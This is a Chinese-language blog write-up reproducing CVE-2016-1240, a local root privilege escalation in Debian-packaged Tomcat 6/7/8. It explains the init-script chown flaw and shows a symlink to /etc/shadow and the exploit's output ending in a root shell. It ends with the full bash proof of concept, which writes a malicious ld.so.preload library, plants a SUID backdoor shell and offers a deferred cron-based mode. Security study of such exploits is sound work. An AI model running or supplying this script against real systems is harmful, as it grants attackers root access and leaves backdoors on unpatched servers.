Tomcat最新本地權限提升漏洞簡單復現

原文鏈接:http://www.freebuf.com/vuls/115862.html

今天才早上得知Tomcat爆新漏洞,雖然不怎么會刷洞,但好奇得我還是本地搭建簡單復現下漏洞,第一次復現了這種高大上的漏洞,心里還是挺激動得,哈哈,記錄下來

先看下漏洞原理:

在Debian系統(tǒng)的Linux上管理員通常利用apt-get進行包管理,deb包是Unixar的標準歸檔,講包文件信息以及包內容,經過gzip和tar打包而成。

該問題出在Tomcat的deb包中,使 deb包安裝的Tomcat程序會自動為管理員安裝一個啟動腳本,該腳本位于/etc/init.d/tomcat*, 跟蹤代碼如下:

171  # Run the catalina.sh script as a daemon
172  set +e 

173  touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
174 chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
175 start-stop-daemon --start -b -u "$TOMCAT7_USER" -g "$TOMCAT7_GROUP" \
176 -c "$TOMCAT7_USER" -d "$CATALINA_TMPDIR" -p "$CATALINA_PID" \
177 -x /bin/bash -- -c "$AUTHBIND_COMMAND $TOMCAT_SH"
178 status="$?"
179 set +a -e
在174行,Tomcat服務在啟動時,會將log文件catalina.out的所有者改為Tomcat用戶, 而啟動腳本通常由root用戶調用。如果將catalina.out修改為指向任意文件的鏈接將會導致攻擊者以高權限隨意操作任意系統(tǒng)文件。

首先注意影響范圍:

Tomcat 8 <= 8.0.36-2

Tomcat 7 <= 7.0.70-2

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

受影響的系統(tǒng)包括Debian、Ubuntu,其他使用相應deb包的系統(tǒng)也可能受到影響。

正文

  • 我自己用的ubuntu實驗的,先安裝上tomcat6
    sudo apt-get install tomcat6

如果提示無法定位軟件包,試試sudo apt-get update下,

后話:本來想在kali下復現的,然后自己在官網上下的tomcat6的安裝包,解壓后直接使用(額,這tm也太快了)發(fā)現/etc/init.d目錄下根本沒有tomcat這個文件,啟動方式直接啟動startup.sh腳本直接啟動的,搞了半天,發(fā)現不對勁,貌似deb包安裝Tomcat安裝的程序才會出現這樣的漏洞,看來應該要用apt-get install這個命令吧,但在kali下執(zhí)行這條命令無法定位軟件包,貌似是阿里源的問題(更新過的)

  • 安裝好了后會自動創(chuàng)建tomcat6這個用戶

再修改下tomcat6用戶的權限,默認是不允許登陸的

sudo usermod -s /bin/bash -G sudo tomcat6
passwd tomcat6 #設置密碼,不設置的話可以無法sudo提升權限
su -l tomcat6 #登陸tocmat6用戶

先來簡單驗證下:

切換到catalina.out的目錄

cd /var/log/tomcat6
ln -fs /etc/shadow /var/log/tomcat6/catalina.out
head cataline.out

此時應該是禁止讀取cataline.out的內容的
需要重啟下tomcat

sudo service tomcat6 restart

重啟tomcat需要root權限,這是為什么需要給tomcat6用戶添加進sudo組的原因

在直接head cataline.out命令,就會發(fā)現已經可以讀寫到/etc/shadow里的內容了


使用poc提權

touch poc.sh #注意都是以tomcat6用戶的身份執(zhí)行命令的
vim poc.sh
#將Poc內容粘貼進來
chmod 777 poc.sh #將腳本設置為可執(zhí)行

最后以tomcat6用戶的身份來執(zhí)行腳本

./poc.sh /var/log/tomcat6/catalina.out

發(fā)現突然卡住了一樣,懵了下子才反應過來還需要等待重啟,md智障

在打開另一個終端,重啟下tomcat

sudo service tomcat6 restart

發(fā)現腳本已經成功被執(zhí)行了

tomcat6@lj:/var/log/tomcat6$ ./poc.sh /var/log/tomcat6/catalina.out
 
Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
CVE-2016-1240

Discovered and coded by: 

Dawid Golunski 
http://legalhackers.com 

[+] Starting the exploit in [active] mode with the following privileges: 
uid=117(tomcat6) gid=126(tomcat6) 組=126(tomcat6),27(sudo)

[+] Target Tomcat log file set to /var/log/tomcat6/catalina.out

[+] Compiling the privesc shared library (/tmp/privesclib.c)

[+] Backdoor/low-priv shell installed at: 
-rwxr-xr-x 1 tomcat6 tomcat6 1017016 10月  8 22:51 /tmp/tomcatrootsh

[+] Symlink created at: 
lrwxrwxrwx 1 tomcat6 tomcat6 18 10月  8 22:51 /var/log/tomcat6/catalina.out -> /etc/ld.so.preload

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...
You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
 

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: 
-rw-r--r-- 1 tomcat6 root 19 10月  8 22:51 /etc/ld.so.preload

[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload

[+] The /etc/ld.so.preload file now contains: 
/tmp/privesclib.so

[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!

[+] Rootshell got assigned root SUID perms at: 
-rwsrwxrwx 1 root root 1017016 10月  8 22:51 /tmp/tomcatrootsh

Please tell me you're seeing this too ;)
  

[+] Executing the rootshell /tmp/tomcatrootsh now! 

tomcatrootsh-4.3# whoami
root
tomcatrootsh-4.3# id
uid=117(tomcat6) gid=126(tomcat6) euid=0(root) 組=0(root),27(sudo),126(tomcat6)

最后退出shell用exit退出即可,完畢!

總結:1)可以看到,這個提權方法還是相對有些雞肋的,需要等待tomcat6重啟才可以獲取root權限
2)收獲很大,繼續(xù)加油

附上poc

#!/bin/bash
#
# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit
#
# CVE-2016-1240
#
# Discovered and coded by:
#
# Dawid Golunski
# http://legalhackers.com
#
# This exploit targets Tomcat (versions 6, 7 and 8) packaging on 
# Debian-based distros including Debian, Ubuntu etc.
# It allows attackers with a tomcat shell (e.g. obtained remotely through a 
# vulnerable java webapp, or locally via weak permissions on webapps in the 
# Tomcat webroot directories etc.) to escalate their privileges to root.
#
# Usage:
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]
#
# The exploit can used in two ways:
#
# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)
#
# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to 
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a 
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can
# then add arbitrary commands to the file which will be executed with root privileges by 
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default 
# Ubuntu/Debian Tomcat installations).
#
# See full advisory for details at:
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"

function cleanexit {
    # Cleanup 
    echo -e "\n[+] Cleaning up..."
    rm -f $PRIVESCSRC
    rm -f $PRIVESCLIB
    rm -f $TOMCATLOG
    touch $TOMCATLOG
    if [ -f /etc/ld.so.preload ]; then
        echo -n > /etc/ld.so.preload 2>/dev/null
    fi
    echo -e "\n[+] Job done. Exiting with code $1 \n"
    exit $1
}

function ctrl_c() {
        echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
    cleanexit 0
}

#intro 
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

# Args
if [ $# -lt 1 ]; then
    echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
    exit 3
fi
if [ "$2" = "-deferred" ]; then
    mode="deferred"
else
    mode="active"
fi

# Priv check
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`"
id | grep -q tomcat
if [ $? -ne 0 ]; then
    echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n"
    exit 3
fi

# Set target paths
TOMCATLOG="$1"
if [ ! -f $TOMCATLOG ]; then
    echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n"
    exit 3
fi
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"

# [ Deferred exploitation ]

# Symlink the log file to /etc/default/locale file which gets executed daily on default
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been
# restarted and file owner gets changed.
if [ "$mode" = "deferred" ]; then
    rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG
    if [ $? -ne 0 ]; then
        echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
        cleanexit 3
    fi
    echo -e  "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"
    echo -e  "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`"
    echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot"
    echo -ne "\n    you'll be able to add arbitrary commands to the file which will get executed with root privileges"
    echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)
 \n\n"
    exit 0
fi

# [ Active exploitation ]

trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
uid_t geteuid(void) {
    static uid_t  (*old_geteuid)();
    old_geteuid = dlsym(RTLD_NEXT, "geteuid");
    if ( old_geteuid() == 0 ) {
        chown("$BACKDOORPATH", 0, 0);
        chmod("$BACKDOORPATH", 04777);
        unlink("/etc/ld.so.preload");
    }
    return old_geteuid();
}
_solibeof_
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl
if [ $? -ne 0 ]; then
    echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
    cleanexit 2;
fi

# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check
if [ -f /etc/ld.so.preload ]; then
    echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
    cleanexit 2
fi

# Symlink the log file to ld.so.preload
rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG
if [ $? -ne 0 ]; then
    echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink."
    cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

# Wait for Tomcat to re-open the logs
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..."
echo -e  "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)
 "
while :; do 
    sleep 0.1
    if [ -f /etc/ld.so.preload ]; then
        echo $PRIVESCLIB > /etc/ld.so.preload
        break;
    fi
done

# /etc/ld.so.preload file should be owned by tomcat user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo --help 2>/dev/null >/dev/null

# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then 
    echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
    echo -e "\n\033[94mPlease tell me you're seeing this too ;)
  \033[0m"
else
    echo -e "\n[!] Failed to get root"
    cleanexit 2
fi

# Execute the rootshell
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p

# Job done.
cleanexit 0
最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容